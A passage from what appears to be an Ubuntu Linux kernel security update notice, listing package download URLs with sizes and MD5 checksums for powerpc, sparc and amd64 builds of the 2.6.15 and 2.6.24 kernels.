http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    40906 6cc3a287b3274036e57638d951480d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    46002 f8964625617902880cc24e8e22e03ba9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    29026 8607a334399fbe27ee424e5bc0a20103\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    29894 9e6fe015d74dd83cccedcfd8f396fbd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   211398 ad7cb3fdf5693590d0f7056e8b9acc6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   225188 6a00a7254a9a82981f23823145ca5a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    45056 c00c74d1ffa33fb6575e59067c90cfa0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    40224 ca94464b9c6eca3e9c8eeec160125e88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     1940 70846ff3e24ac904d034f07126d64a9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     2200 fa5bc162b62817d3c9f5c055d88d6016\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    80762 dead1604f5dff825e55e5299d06488dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    86134 50f5270dc53e13c36aa423d3fb6b0af1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   111594 64c98d595b636e46123746b50eb18cd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   125750 cad66f8b2febf24ba43c5a7db6a22312\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    53424 c668f84292a263caef7ce813b769822e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    58488 8903219e8e58a8d79564945284f00e34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   147966 1566e7aa02add4341766fd937fc907ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   161910 164c7d5ef77d1693a631ce60fcc4ef8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   318400 a6441e2cd0b1b9ecb1601516f89ff6ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   288040 bd11c9922fea1638ce64b776f060f81f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   115862 9eb166a9f0fb53dfd89d657cc835d10f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   116550 41e72d8893ca5a8351df20b6c7c5d2bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1925168 1ad660874ee5005becbc5841bf0e9b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  2449218 45d3b3e3f88b9e764c3243c2858d3730\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5:   867470 f6031f3c87c28ee40eefa25086b71c52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5:   868848 cd0781159d8768b9c92bae2d844d7b6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb\n      Size/MD5:   870010 f3f837cb5cd7e1fe97182ddbb7eb1a56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_powerpc.deb\n      Size/MD5:  6946990 d65d0ad6fdc2493e7e6c1a9d567424f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5: 22784626 aef1ff7ccf13cd2e2d41c80f22264eeb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb\n      Size/MD5: 23693200 0443d7e8b68c5f89aaf7e02e666077f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb\n      Size/MD5: 22365476 97b5182024c5fe55fe1d45b23a39a277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    17786 39dca7a61069a0e3c0877662e3fbb571\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    17392 b0b9f69f913131d17af3ab6d4bd6e8b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   261374 b0b06da41991553a487982e73fe34176\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   282628 81e78bd764bb0fc65be704f3f0be4db6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   227826 39456da28b0f6baa3b74b842eba6acf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   248944 94f3cc4cabe7f4344ea0c6ca8d6487d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1048472 a6d7ef42bf3b8de677ec5fe562228e7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1048600 5e01699eaac6cd159a04c724e442e321\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1738662 d43bf20af0979b29ad1c6df616862056\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1878206 711e748077e06773658c64416bfa83be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   250824 9d2ad9e9b79a628140775760c6fb2493\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   233538 0730a8fbc4148651919c3a74c3e1face\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    13058 11382e6f8ed79855a01a6151733d4549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    13532 ad6adbe2c5040390d563fb6221a7a346\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    84800 0159144d3b6d69b9e319731669dea56e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    52202 9ddf5200aca5383eae56f5b7ab414c3d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    73934 43991eb97d8f163e7763dc89cef5b1aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    85852 20dd6d2d5ea003539e1b4f7f37bb83ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     6622 2d7cc5ebe8079dd0fae1860409cf1a8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:     7060 4dc37eb02f6742808d26548a0ecb79ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    60382 24f359b6596789e61bbd001fd90c5a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    70426 8128abfff4f7ab8f32370a151dd27602\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   128552 86b1f62ab4d815af984fea8e0556fd0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   157952 675fec1992efcfa46cf0043e3507513d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   108160 eb2056a3b1940d3b3b27adcb8df1e68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   126140 d1c23f615d6aeebe6594386d424ef7f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    87300 47e6e945e4651347cde5e76965131a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    93364 802c107ffe461103294fd58c1d12b139\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  2014806 d15cb3eea9558346c08029994feba932\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:  1988698 47499eab748909cbc24d41eb251bd57e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   104128 3e626e3e4c59a16338d00953874420d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   115796 5ff731f56aac5f43999c70e98d250892\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    12740 3b4d8bea0a856073ea6116bcdafed867\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    14446 9796772a49dc9688c64fde72be43f446\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    39954 6491b77cf30155c06612af32748ab26d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    41542 c99144c5929ec38a934702c2e041e0df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   149346 8d4aab9ae6c9f04ed1d4968708c14c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   168124 72dcb481cb91bfb750e7d7cb3b2bab4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    42314 7f7347a9dfcafcc43469d4d4364c1af8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:    44916 2641528d804b1c1dd2f7d0e04f3a044b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   320330 6aff8b286b3ddf7dfc33ce99f504f1e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb\n      Size/MD5:   324878 11ab2f5d09092b3f9797e673e413ab2c\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    50478 116bcbef4cbedbce5345d410424b6463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     2354 df747032ea1217e02817c8dec92bcd75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    40376 4337e5c50ab6220a5ee46b46f98669f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   110558 bfa3abba4946456a8f6d99a1a405f72e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    41214 7fa46c5fc72ef82e476804fcb3c3560e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   104226 3208d817b562267bba9539f854fe388b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     7436 87a0b43fa978113a74cb8e79b8dd4774\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   149312 9341cb99291093f7e5624f6e9f3c9daa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1712908 f0e841e92ee8a38b75543485f86a2b4c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb\n      Size/MD5:   771900 6c8197f994e366ec847414a13eb7b906\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb\n      Size/MD5:   771444 46d3fb1d75439b65635bfaac6d653d74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_sparc.deb\n      Size/MD5:  6963130 11d85b5ba6c6e5d333b860b7a5163b5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb\n      Size/MD5: 15016950 1f36bbfe3b2db1e844d76d984a4a661a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb\n      Size/MD5: 14832050 bc36836f43a994fb29143301526c2ace\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     7436 76dc77e08053d579849c4c09c8328b80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   248770 dd30a7c1c47f07012b5bf0ee7fd16ca4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   212536 bf4b63251214a4622ce5a55f902203bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1048476 575854b9cc92279f65c4acfa0a60e43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1482448 de80e93cfd56c729a74ded3b97946846\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    10114 4a3f85652ffd60eb4a94ab3093227db2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    40176 660660949865f2de6403ad165b9faa60\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:     9368 65475425005847418b7d9380e4fed4a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    61402 264bfd4456975f04ca592789983eb77b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   163278 1df17d4edff53b6e1102ab15ff671216\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    64092 52a9af94cf9a1ace816d3b1b727738dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:  1235410 e44d8dda7d391021570cc0a826f6c5fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    59308 00fbe909018b76d099f47d9c39d72a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:    37426 56112905d8bef55a258eb7aa59cb946b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb\n      Size/MD5:   280130 fb9c0d56db0d19a09524d36af51f4687\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.diff.gz\n      Size/MD5:  4813262 c1da8b33fcf63ededcc7ab2498e4c964\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.dsc\n      Size/MD5:     2258 f1f1a3629c40ac86e1b6172f2f3966cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.70_all.deb\n      Size/MD5:  4932582 c75bb688dfed58df39fa72161bc6471c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28_2.6.24-28.70_all.deb\n      Size/MD5:  8149016 f80aeb18376bc0371a80a5acbbc4f042\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-28.70_all.deb\n      Size/MD5:   100904 3996ef6a1321c852676912837f7d9896\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-28.70_all.deb\n      Size/MD5: 46982104 a90fab943db79ec907e1cbf97c869092\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    28610 b861f6c6aa20728c83bbc0ec9ae239a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   224204 bd768c83d861caa00758232ec48f21f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    52648 663642186c3344039e31afcf1d88b48f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    40640 9ea576c926e3b3b68dd2f98f2c7b634f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    48646 d00ff865f10bd95cfe0d7f556fd96135\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    86332 d969a4a0657104af706645718743733d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    36314 98ac23e9bc91e2a54840f86bdd6e96ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   648768 458b6968f63bc8134e62c47e8a9be732\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   209944 04c1a8cd3bf7a25da0e78fbb8f90d111\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    39192 254eeda71366bfe9c3e4f7b56828f526\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:    67984 29f9c63dbfd2f8f86ea71b2e9cae813b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   145448 689d507482ed8b85fd15f33d8bdfe737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   287268 73a2edaf7afc4a65aa77e8995ed3b3e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:  2130812 20affc23d001c3a542b0adfa947e12eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_amd64.deb\n      Size/MD5:   675578 f6d7fe8d4eda5ed7e6e4edd2ab9fa2ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_amd64.deb\n      Size/MD5:  1254372 28e7eaca202b7aefa71b0e3e943d98a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_amd64.deb\n      Size/MD5:  1276462 1d5f451c0c43c965d585e34d0799dc77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_amd64.deb\n      Size/MD5:   675490 1ea0767f5025162a3350687d3977c1a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_amd64.deb\n      Size/MD5:  1086568 643d57e3d1cbb403787588819535ba3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_amd64.deb\n      Size/MD5: 17815434 ca2be2f4f00cd6c412beec384e6569d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_amd64.deb\n      Size/MD5: 17785084 624ae6cd24926052048734802477e137\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_amd64.deb\n      Size/MD5: 21063276 fa087ed3f1b02b40b09dcfe89d45f73d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_amd64.deb\n      Size/MD5: 21435602 6dac3b165e31f9409240389cd33138ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_amd64.deb\n      Size/MD5:   709144 770ddfa645769cb3bbd36fd3213da463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb\n      Size/MD5:   263670 